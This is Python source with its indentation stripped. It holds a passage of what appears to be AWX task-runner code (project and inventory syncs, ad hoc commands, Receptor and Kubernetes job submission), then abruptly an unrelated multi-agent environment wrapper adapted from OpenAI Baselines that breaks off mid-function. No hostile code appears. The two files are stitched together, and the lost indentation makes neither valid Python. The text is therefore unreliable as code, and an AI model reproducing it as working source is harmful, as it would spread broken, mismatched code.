cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
transmitter_thread.join()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
state_name = receptor_work_list[self.unit_id]['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occured at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task:
ee = self.task.instance.resolve_execution_environment()
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
env_wrappers.py
|
"""
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
from baselines.common.tile_images import tile_images
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if all(done):
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'get_agent_types':
if all([hasattr(a, 'adversary') for a in env.agents]):
remote.send(['adversary' if a.adversary else 'agent' for a in
env.agents])
else:
remote.send(['agent' for _ in env.agents])
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.envs = [fn() for fn in env_fns] #newly added
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.remotes[0].send(('get_agent_types', None))
self.agent_types = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
if all([hasattr(a, 'adversary') for a in env.agents]):
self.agent_types = ['adversary' if a.adversary else 'agent' for a in
env.agents]
else:
self.agent_types = ['agent' for _ in env.agents]
self.ts = np.zeros(len(self.envs), dtype='int')
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
results = [env.step(a) for (a,env) in zip(self.actions, self.envs)]
